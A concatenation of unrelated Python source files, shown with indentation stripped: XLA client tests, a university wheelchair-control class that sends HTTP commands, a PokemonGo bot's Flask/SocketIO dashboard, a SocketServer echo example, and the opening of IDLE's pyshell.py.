_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target backend.")
InstantiateTests(globals(),
lambda: xla_client.get_local_backend(FLAGS.backend))
absltest.main()
|
control.py
|
#NAME: move.py
#DATE: 08/02/2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python class for moving the wheelchair in an intuative manner
#COPY: Copyright 2019, All Rights Reserved, Ryan McCartney
import numpy as np
import threading
import time
import math
import requests
import pygame
from requests import Session
#define threading wrapper
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
class Control:
#Received Variables
batteryVoltage = 0
rightMotorCurrent = 0
leftMotorCurrent = 0
status = "NULL"
#Intrinsic Parameters
setSpeed = 0
setAngle = 0
setCommand = "SEND"
bootTime = 8
debug = False
def __init__(self,configuration):
self.connected = False
#Load Configuration Variables
try:
self.host = configuration['control']['url']
self.maxSpeed = configuration['control']['maxSpeed']
#Get the details of the log file from the configuration
logFilePath = configuration['general']['logFileDirectory']
logFileName = "gamepadNavigation.txt"
self.logFileFullPath = logFilePath + logFileName
self.logging = True
#Open log file
try:
self.log("INFO = Control class has accessed log file.")
except:
self.logging = False
self.log("ERROR: Unable to access log file when initialising control interface.")
except:
self.log("ERROR = The configuration file cannot be decoded.")
self.gamepadRunning = False
self.gamepad()
#Open Transmission and Receive Log Files
try:
#Create a file for both transmission and receive logs depending on time
currentDateTime = time.strftime("%d-%m-%Y")
#Initialise Transmit Log
self.transmitLogFilePath = "data\control\Transmitted Data -" + currentDateTime + ".csv"
transmitLog = open(self.transmitLogFilePath,"w")
transmitLog.write("Date and Time,Speed,Angle,Command Message\n")
transmitLog.close()
#Initialise Receive Log
self.receiveLogFilePath = "data\control\Received Data - " + currentDateTime + ".csv"
receiveLog = open(self.receiveLogFilePath,"w")
receiveLog.write("Date & Time,Battery Voltage(V),Right Current (A),Left Current (A),Status Message\n")
receiveLog.close()
#Log Entry
self.log("INFO = Opened Log files for transmission and receive data.")
except:
self.log("ERROR = Could not open transmit and receive logs.")
#Send Message and Retrieve Response
self.reset()
self.log("INFO = Control interface initialised succesfully.")
#Logging Function
def log(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.logFileFullPath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
print(logEntry)
#Receive Log Function
def receiveLog(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + "," + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.receiveLogFilePath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
#Transmit Log Function
def transmitLog(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.transmitLogFilePath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
#Send and Receive Messages with implemented logging
@threaded
def gamepad(self):
topSpeed = 30
try:
pygame.init()
pygame.joystick.init()
#Check number of gamepads
gamepads = pygame.joystick.get_count()
#Log Entry
self.log("INFO = "+str(gamepads)+" gamepads avalible.")
if gamepads > 0:
#Initialise first gamepad
j = pygame.joystick.Joystick(0)
j.init()
#Check axis avalible
axis = j.get_numaxes()
#Log Entry
self.log("INFO = Gamepad with "+str(axis)+" axis has been initiated.")
while 1:
while self.gamepadRunning:
#Get Current Data
pygame.event.get()
xAxisLeft = j.get_axis(0)
yAxisLeft = j.get_axis(1)
aButton = j.get_button(0)
bButton = j.get_button(1)
yButton = j.get_button(2)
xButton = j.get_button(3)
#print("Raw data =",xAxisLeft,",",yAxisLeft)
#Mapped Data for API
speed = int(-yAxisLeft*topSpeed)
angle = int(-xAxisLeft*100)
#On button presses start and stop wheelchair
if aButton == True:
self.reset()
if bButton == True:
self.eStop()
if xButton == True:
topSpeed = topSpeed + 1
if topSpeed > 100:
topSpeed = 100
self.log("INFO = Top Speed is now "+str(topSpeed))
if yButton == True:
topSpeed = topSpeed - 1
if topSpeed < 0:
topSpeed = 0
self.log("INFO = Top Speed is now "+str(topSpeed))
#If new command has been identified then send new data to API
if (self.setSpeed != speed) or (self.setAngle != angle):
self.transmitCommand(speed,angle,"RUN")
#print("Mapped speed is",speed,"and the angle is",angle)
except:
#Log Entry
self.log("STATUS = No Gamepads are avalible. Have you connected any?")
#Converts speed in m/s to arbitary units for commands
def getSpeedValue(self,speed):
#Linear Relationship parmamters for conversion
m = 0.0319
c = -0.1
speedArbitary = int((speed - c)/m)
return speedArbitary
#Converts speed in arbitary unit to metrics
def getSpeedMetric(self,speed):
#Linear Relationship parmamters for conversion
m = 0.0319
c = -0.1
speedMetric = (m*speed)+c
speedMetric = round(speedMetric,2)
return speedMetric
#returns the distance travelled based on the speed
@staticmethod
def distanceTravelled(speed, time):
distance = speed*time
return distance
#parse response
def decodeResponse(self, receivedMessage):
if receivedMessage != "":
data = receivedMessage.split(",")
if len(data) >= 4:
self.batteryVoltage = data[0]
self.rightMotorCurrent = data[1]
self.leftMotorCurrent = data[2]
self.status = data[3]
#Determine Power Consumption (in Watts)
def powerConsumed(self):
self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
#Accounting for Baseload Current Consumption (A)
current = 1.25
#Calculation Carried out using simple P=VI Equation
current = current + self.rightMotorCurrent + self.leftMotorCurrent
power = self.batteryVoltage*current
return power
#Speed Ramping Function
def rampSpeed(self,newSpeed,acceleration):
#Update Variables Before Starting
self.getUpdate()
delay = 1/acceleration
delay = int(delay)
command = "RUN"
#Direction Forward
if newSpeed >= 0:
#Accelerate
if newSpeed > self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed + 1
self.transmitCommand(speed,self.setAngle,command)
time.sleep(delay)
#Decelerate
elif newSpeed < self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed - 1
self.transmitCommand(speed,self.setAngle,command)
time.sleep(delay)
#Direcion Reverse
if newSpeed < 0:
#Accelerate
if newSpeed < self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed - 1
time.sleep(delay)
self.transmitCommand(speed,self.setAngle,command)
#Decelerate
elif newSpeed > self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed + 1
time.sleep(delay)
self.transmitCommand(speed,self.setAngle,command)
if self.connected == True:
self.log("INFO = Speed has been ramped to "+str(newSpeed)+" with an acceleration of "+str(acceleration))
else:
self.log("ERROR = Wheelchair speed cannot be ramped.")
return newSpeed
#Function to change the turn the wheelchair a specific angle
def turn(self,angle):
factor = 40
if angle < 0:
delay = (-angle)/factor
self.transmitCommand(30,100,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
elif angle > 0:
delay = angle/factor
self.transmitCommand(-30,100,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
else:
self.transmitCommand(0,0,"SEND")
if self.connected == True:
self.log("INFO = Wheelchair has turned "+str(angle)+" degrees.")
else:
self.log("ERROR = Wheelchair has not turned as requested.")
#Function to change the move the wheelchair a specific distance in meters
def move(self,distance):
factor = 1
delay = int(distance/factor)
self.transmitCommand(30,0,"SEND")
time.sleep(delay)
self.transmitCommand(0,0,"SEND")
if self.connected == True:
self.log("INFO = Wheelchair has moved "+str(distance)+"m.")
else:
self.log("ERROR = Wheelchair cannot be moved.")
#Function to change the move the wheelchair a specific distance in meters
def changeRadius(self,radius):
delay = 0.1
factor = 1
radius = radius/factor
radius = int(radius)
angle = self.setAngle
while radius > self.setAngle:
angle = angle + 1
self.transmitCommand(self.setSpeed,angle,"SEND")
time.sleep(delay)
while radius < self.setAngle:
angle = angle - 1
self.transmitCommand(self.setSpeed,angle,"SEND")
time.sleep(delay)
if self.connected == True:
self.log("INFO = Wheelchair turning radius is now "+str(radius)+"m.")
else:
self.log("ERROR = Wheelchair turning radius cannot be changed.")
#Function to Calculate Speed Lmit bases on the value of the closest point
def changeAngle(self, angle):
command = "SEND"
self.transmitCommand(self.setSpeed,angle,command)
if self.connected == True:
self.setAngle = angle
self.log("INFO = Wheelchair turning angle is now "+str(angle))
else:
self.log("ERROR = Wheelchair angle cannot be changed")
def changeSpeed(self, speed):
speed = int(speed)
command = "SEND"
self.transmitCommand(speed,self.setAngle,command)
if self.connected == True:
self.setSpeed = speed
self.log("INFO = Wheelchair speed is now set as "+str(speed))
else:
self.log("ERROR = Wheelchair speed cannot be changed")
#Emergency Stop the wheelchair
def eStop(self):
self.transmitCommand(0,0,"STOP")
if self.connected == True:
self.log("INFO: Wheelchair has Emergency Stopped.")
else:
self.log("ERROR = Warning, the Wheelchair cannot be stopped!")
#Reset the wheelchair
def reset(self):
self.transmitCommand(0,0,"RESET")
if self.connected == True:
self.log("INFO = Wheelchair is being reset.")
for x in range(self.bootTime,0,-1):
self.log("INFO = "+str(x)+" seconds remaining until wheelchair completes boot up.")
time.sleep(1)
else:
self.log("ERROR = Wheelchair cannot be reset.")
#Funtion to Update Variables
def getUpdate(self):
self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
if self.connected == False:
self.log("INFO = Communication link down.")
#Function to Calculate Speed Lmit bases on the value of the closest point
def calcMaxSpeed(self,closestObject):
x = closestObject
a = -5.6593
b = 29.089
c = -5.1123
d = 3.3333
#Third Order Deceleration Custom Profile
maxSpeedNew = (a*math.pow(x,3))+(b*math.pow(x,2))+(c*x)+d
maxSpeedNew = round(maxSpeedNew,2)
self.maxSpeed = int(maxSpeedNew)
#Prevent Speeds higher than the limit set
if self.setSpeed > 0:
speedMagnitude = int(self.setSpeed)
if speedMagnitude > self.maxSpeed:
self.transmitCommand(self.maxSpeed,self.setAngle,"SEND")
#Collision Avoidance Algorithm
@threaded
def collisionAvoidance(self):
while 1:
#If Wheelchair is breaking the Speed Limit (Set by Closest Object)
if self.setSpeed > self.maxSpeed:
#Determine Rate of Decelleration depending on delta
decceleration = self.setSpeed - self.maxSpeed
#Adjust Speed
self.rampSpeed(self.maxSpeed,decceleration)
elif self.setSpeed < self.maxSpeed:
#Determine Rate of Acceleration depending on delta
acceleration = self.maxSpeed - self.setSpeed
#Adjust Speed
self.rampSpeed(self.maxSpeed,acceleration)
#Send and Receive Messages with implemented logging
def transmitCommand(self, speed, angle, command):
#Start Timing
start = time.time()
#Make sure values passed are integars
speed = int(speed)
angle = int(angle)
#Check speed does not exceed limit
if speed > 0:
if speed > self.maxSpeed:
speed = self.maxSpeed
#Create form of the payload
payload = str(speed)+","+str(angle)+","+ command
#combine with host address
message = self.host + payload
try:
response = requests.post(message,timeout=0.5)
data = response.content.decode("utf-8").split("\r\n")
if self.debug == True:
self.log("INFO = Transmission response code is "+str(response.status_code))
#Write log entry regarding data transmitted
self.transmitLog(str(speed) + "," + str(angle) + "," + command)
if data[0] != "":
#Write log entry regarding response
self.receiveLog(data[0])
self.log("STATUS = Received data is as follows; " + data[0])
#Decode Data
self.decodeResponse(data[0])
if response.status_code == 200:
self.connected = True
self.setSpeed = speed
self.setAngle = angle
self.setCommand = command
if self.debug == True:
end = time.time()
print("STATUS: Sending '",payload,"' took %.2f seconds." % round((end-start),2))
except:
self.log("ERROR = Could not access wheelchair API")
self.connected = False
|
__init__.py
|
from threading import Thread
import os
import logging
from flask import Flask, request, jsonify, render_template, send_from_directory
from flask_socketio import SocketIO, emit
from pokemongo_bot import logger
from pokemongo_bot.event_manager import manager
from api.json_encodable import JSONEncodable
# pylint: disable=unused-variable, unused-argument
logging.getLogger('socketio').disabled = True
logging.getLogger('engineio').disabled = True
logging.getLogger('werkzeug').disabled = True
google_maps_api_key = None
def run_flask():
root_dir = os.path.join(os.getcwd(), 'web')
app = Flask(__name__, static_folder=root_dir, template_folder=root_dir)
app.use_reloader = False
app.debug = False
app.config["SECRET_KEY"] = "OpenPoGoBot"
socketio = SocketIO(app, logging=False, engineio_logger=False)
cached_events = {}
active_bots = {}
@manager.on("bot_initialized")
def bot_initialized(bot):
# pylint: disable=global-statement
global google_maps_api_key
if google_maps_api_key is None or len(google_maps_api_key) == 0:
google_maps_api_key = bot.config.gmapkey
emitted_object = {
"username": bot.get_username(),
"coordinates": bot.get_position()
}
active_bots[bot.get_username()] = emitted_object
socketio.emit("bot_initialized", [emitted_object], namespace="/event")
@app.route("/")
def index():
if len(active_bots) == 0:
return "No bots currently active."
if google_maps_api_key is None or len(google_maps_api_key) == 0:
return "No Google Maps API key provided."
return render_template("index.html", google_maps_api_key=google_maps_api_key)
@app.route("/<path:path>")
def static_proxy(path):
return app.send_static_file(path)
@app.route("/get-running-bots")
def get_running_bots():
return jsonify(active_bots)
@socketio.on("connect", namespace="/event")
def connect():
socketio.emit("bot_initialized", [active_bots[bot] for bot in active_bots], namespace="/event")
logger.log("Web client connected", "yellow", fire_event=False)
@socketio.on("disconnect", namespace="/event")
def disconnect():
logger.log("Web client disconnected", "yellow", fire_event=False)
@manager.on("logging")
def logging_event(text="", color="black"):
line = {"output": text, "color": color}
socketio.emit("logging", [line], namespace="/event")
@manager.on("position_updated")
def position_update(bot, coordinates=None):
if coordinates is None:
return
emitted_object = {
"coordinates": coordinates,
"username": bot.get_username()
}
cached_events["position"] = emitted_object
active_bots[bot.get_username()]["coordinates"] = coordinates
socketio.emit("position", emitted_object, namespace="/event")
@manager.on("gyms_found", priority=-2000)
def gyms_found_event(bot=None, gyms=None):
if gyms is None or len(gyms) == 0:
return
emitted_object = {
"gyms": JSONEncodable.encode_list(gyms),
"username": bot.get_username()
}
cached_events["gyms"] = emitted_object
socketio.emit("gyms", emitted_object, namespace="/event")
@manager.on("pokestops_found", priority=-2000)
def pokestops_found_event(bot=None, pokestops=None):
if pokestops is None or len(pokestops) == 0:
return
emitted_object = {
"pokestops": JSONEncodable.encode_list(pokestops),
"username": bot.get_username()
}
cached_events["pokestops"] = emitted_object
socketio.emit("pokestops", emitted_object, namespace="/event")
@manager.on("player_update", priority=-2000)
def player_updated_event(bot=None, player=None):
if player is None:
return
emitted_object = {
"player": player.to_json_encodable(),
"username": bot.get_username()
}
cached_events["player"] = emitted_object
socketio.emit("player", emitted_object, namespace="/event")
@manager.on("inventory_update", priority=-2000)
def inventory_updated_event(bot, inventory=None):
# type: (PokemonGoBot, Dict[int, int]) -> None
if inventory is None or inventory.get("count", 0) == 0:
return
emitted_object = {
"inventory": inventory,
"username": bot.get_username()
}
cached_events["inventory"] = emitted_object
socketio.emit("inventory", emitted_object, namespace="/event")
@manager.on("pokemon_found", priority=-2000)
def pokemon_found_event(bot=None, encounters=None):
if encounters is None or len(encounters) == 0:
return
emitted_object = {
"nearby_pokemon": JSONEncodable.encode_list(encounters),
"username": bot.get_username()
}
cached_events["nearby_pokemon"] = emitted_object
socketio.emit("nearby_pokemon", emitted_object, namespace="/event")
socketio.run(app, host="0.0.0.0", port=8001, debug=False, use_reloader=False, log_output=False)
WEB_THREAD = Thread(target=run_flask)
WEB_THREAD.daemon = True
WEB_THREAD.start()
|
SocketServer_echo_simple.py
|
#!/usr/bin/env python
"""Echo server example for SocketServer
"""
#end_pymotw_header
import SocketServer
class EchoRequestHandler(SocketServer.BaseRequestHandler):
def handle(self):
# Echo the back to the client
data = self.request.recv(1024)
self.request.send(data)
return
if __name__ == '__main__':
import socket
import threading
address = ('localhost', 0) # let the kernel assign a port
server = SocketServer.TCPServer(address, EchoRequestHandler)
ip, port = server.server_address # what port was assigned?
t = threading.Thread(target=server.serve_forever)
t.setDaemon(True) # don't hang on exit
t.start()
# Connect to the server
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
# Send the data
message = 'Hello, world'
print 'Sending : "%s"' % message
len_sent = s.send(message)
# Receive a response
response = s.recv(len_sent)
print 'Received: "%s"' % response
# Clean up
server.shutdown()
s.close()
server.socket.close()
|
pyshell.py
|
#! /usr/bin/env python3
try:
from tkinter import *
except ImportError:
print("** IDLE can't import Tkinter.\n"
"Your Python may not be configured for Tk. **", file=sys.__stderr__)
raise SystemExit(1)
import tkinter.messagebox as tkMessageBox
if TkVersion < 8.5:
root = Tk() # otherwise create root in main
root.withdraw()
tkMessageBox.showerror("Idle Cannot Start",
"Idle requires tcl/tk 8.5+, not %s." % TkVersion,
parent=root)
raise SystemExit(1)
from code import InteractiveInterpreter
import getopt
import io
import linecache
import os
import os.path
from platform import python_version, system
import re
import socket
import subprocess
import sys
import threading
import time
import tokenize
import warnings
from idlelib import testing # bool value
from idlelib.colorizer import ColorDelegator
from idlelib.config import idleConf
from idlelib import debugger
from idlelib import debugger_r
from idlelib.editor import EditorWindow, fixwordbreaks
from idlelib.filelist import FileList
from idlelib import macosx
from idlelib.outwin import OutputWindow
from idlelib import rpc
from idlelib.run import idle_formatwarning, PseudoInputFile, PseudoOutputFile
from idlelib.undo import UndoDelegator
HOST = '127.0.0.1' # python execution server on localhost loopback
PORT = 0 # someday pass in host, port for remote debug capability
# Override warnings module to write to warning_stream. Initialize to send IDLE
# internal warnings to the console. ScriptBinding.check_syntax() will
# temporarily redirect the stream to the shell window to display warnings when
# checking user's code.
warning_stream = sys.__stderr__ # None, at least on Windows, if no console.
def idle_showwarning(
message, category, filename, lineno, file=None, line=None):
"""Show Idle-format warning (after replacing warnings.showwarning).
The differences are the formatter called, the file=None replacement,
which can be None, the capture of the consequence AttributeError,
and the output of a hard-coded prompt.
"""
if file is None:
file = warning_stream
try:
file.write(idle_formatwarning(
message, category, filename, lineno, line=line))
file.write(">>> ")
except (AttributeError, OSError):
pass # if file (probably __stderr__) is invalid, skip warning.
_warnings_showwarning = None
def capture_warnings(capture):
"Replace warning.showwarning with idle_showwarning, or reverse."
global _warnings_showwarning
if capture:
if _warnings_showwarning is None:
_warnings_showwarning = warnings.showwarning
warnings.showwarning = idle_showwarning
else:
if _warnings_showwarning is not None:
warnings.showwarning = _warnings_showwarning
_warnings_showwarning = None
capture_warnings(True)
def extended_linecache_checkcache(filename=None,
orig_checkcache=linecache.checkcache):
"""Extend linecache.checkcache to preserve the <pyshell#...> entries
Rather than repeating the linecache code, patch it to save the
<pyshell#...> entries, call the original linecache.checkcache()
(skipping them), and then restore the saved entries.
orig_checkcache is bound at definition time to the original
method, allowing it to be patched.
"""
cache = linecache.cache
save = {}
for key in list(cache):
if key[:1] + key[-1:] == '<>':
save[key] = cache.pop(key)
orig_checkcache(filename)
cache.update(save)
# Patch linecache.checkcache():
linecache.checkcache = extended_linecache_checkcache
class PyShellEditorWindow(EditorWindow):
"Regular text edit window in IDLE, supports breakpoints"
def __init__(self, *args):
self.breakpoints = []
EditorWindow.__init__(self, *args)
self.text.bind("<<set-breakpoint-here>>", self.set_breakpoint_here)
self.text.bind("<<clear-breakpoint-here>>", self.clear_breakpoint_here)
self.text.bind("<<open-python-shell>>", self.flist.open_shell)
self.breakpointPath = os.path.join(idleConf.GetUserCfgDir(),
'breakpoints.lst')
# whenever a file is changed, restore breakpoints
def filename_changed_hook(old_hook=self.io.filename_change_hook,
self=self):
self.restore_file_breaks()
old_hook()
self.io.set_filename_change_hook(filename_changed_hook)
if self.io.filename:
self.restore_file_breaks()
self.color_breakpoint_text()
rmenu_specs = [
("Cut", "<<cut>>", "rmenu_check_cut"),
("Copy", "<<copy>>", "rmenu_check_copy"),
("Paste", "<<paste>>", "rmenu_check_paste"),
(None, None, None),
("Set Breakpoint", "<<set-breakpoint-here>>", None),
("Clear Breakpoint", "<<clear-breakpoint-here>>", None)
]
def color_breakpoint_text(self, color=True):
"Turn colorizing of breakpoint text on or off"
if self.io is None:
# possible due to update in restore_file_breaks
return
if color:
theme = idleConf.CurrentTheme()
cfg = idleConf.GetHighlight(theme, "break")
else:
cfg = {'foreground': '', 'background': ''}
self.text.tag_config('BREAK', cfg)
def set_breakpoint(self, lineno):
text = self.text
filename = self.io.filename
text.tag_add("BREAK", "%d.0" % lineno, "%d.0" % (lineno+1))
try:
self.breakpoints.index(lineno)
except ValueError: # only add if missing, i.e. do once
self.breakpoints.append(lineno)
try: # update the subprocess debugger
debug = self.flist.pyshell.interp.debugger
debug.set_breakpoint_here(filename, lineno)
except: # but debugger may not be active right now....
pass
def set_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
self.set_breakpoint(lineno)
def clear_breakpoint_here(self, event=None):
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
lineno = int(float(text.index("insert")))
try:
self.breakpoints.remove(lineno)
except:
pass
text.tag_remove("BREAK", "insert linestart",\
"insert lineend +1char")
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_breakpoint_here(filename, lineno)
except:
pass
def clear_file_breaks(self):
if self.breakpoints:
text = self.text
filename = self.io.filename
if not filename:
text.bell()
return
self.breakpoints = []
text.tag_remove("BREAK", "1.0", END)
try:
debug = self.flist.pyshell.interp.debugger
debug.clear_file_breaks(filename)
except:
pass
def store_file_breaks(self):
"Save breakpoints when file is saved"
# XXX 13 Dec 2002 KBK Currently the file must be saved before it can
# be run. The breaks are saved at that time. If we introduce
# a temporary file save feature the save breaks functionality
# needs to be re-verified, since the breaks at the time the
# temp file is created may differ from the breaks at the last
# permanent save of the file. Currently, a break introduced
# after a save will be effective, but not persistent.
# This is necessary to keep the saved breaks synched with the
# saved file.
#
# Breakpoints are set as tagged ranges in the text.
# Since a modified file has to be saved before it is
# run, and since self.breakpoints (from which the subprocess
# debugger is loaded) is updated during the save, the visible
# breaks stay synched with the subprocess even if one of these
# unexpected breakpoint deletions occurs.
breaks = self.breakpoints
filename = self.io.filename
try:
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
except OSError:
lines = []
try:
with open(self.breakpointPath, "w") as new_file:
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
except OSError as err:
if not getattr(self.root, "breakpoint_error_displayed", False):
self.root.breakpoint_error_displayed = True
tkMessageBox.showerror(title='IDLE Error',
message='Unable to update breakpoint list:\n%s'
% str(err),
parent=self.text)
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
if self.io is None:
# can happen if IDLE closes due to the .update() call
return
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
with open(self.breakpointPath, "r") as fp:
lines = fp.readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index].string))
end = int(float(ranges[index+1].string))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.CurrentTheme()
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
def removecolors(self):
# Don't remove shell color tags before "iomark"
for tag in self.tagdefs:
self.tag_remove(tag, "iomark", "end")
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = None
self.port = PORT
